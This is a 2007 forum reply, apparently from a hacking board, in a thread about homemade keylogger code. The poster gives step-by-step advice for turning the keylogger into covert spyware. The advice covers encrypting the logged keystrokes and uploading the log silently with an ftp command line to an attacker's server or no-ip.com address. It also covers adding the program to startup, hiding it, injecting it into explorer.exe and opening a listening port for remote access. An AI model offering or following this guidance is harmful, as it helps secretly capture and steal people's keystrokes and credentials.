
yourISP.
Enthusiast
Aug 4, 2007, 9:39 AM
Post #11 of 11
(1339 views)
Shortcut
|
|
Re: [wakka] This is my! And only My Only!!! "Keylogger Code"
[In reply to]
|
Can't Post
|
|
Well, this a beginning of a key logger. Its quite easy make the program encrypt each character it adds to the the file, that way if the user finds it, all he will see is a bunch of gibberish. Then after the size of the file meets a certain amount, the machine does:
ftp -A [IP address] put [path to key file] c:\ (or wherever you want to put this file on the FTP server.) quit I believe that is the proper syntax, but i haven't used ftp for a while. This would upload the key file to the attackers machine where it would be unencrypted and studied. This could be done silently without the user even knowing that a connection to an FTP server is being made, and stuff is being uploaded. Of course you don't want it connecting right to you, just use some FREE FTP server online, or make a static IP at no-ip.com After these functions have been implemented in your key logger, make it add itself to startup, and teach it how to hide itself, inject it into explorer.exe ;) If your good with C++ you could make a key logger like this in a matter of hours. Why do you need to make it send the keys via e-mail? This makes it all so much more complicated. To make it even better, you could listen for connections on port 1337 or w/e. You connect, and your all set. BTW
"Some of the most intellegent people I know smoke marijuana" --Lother
|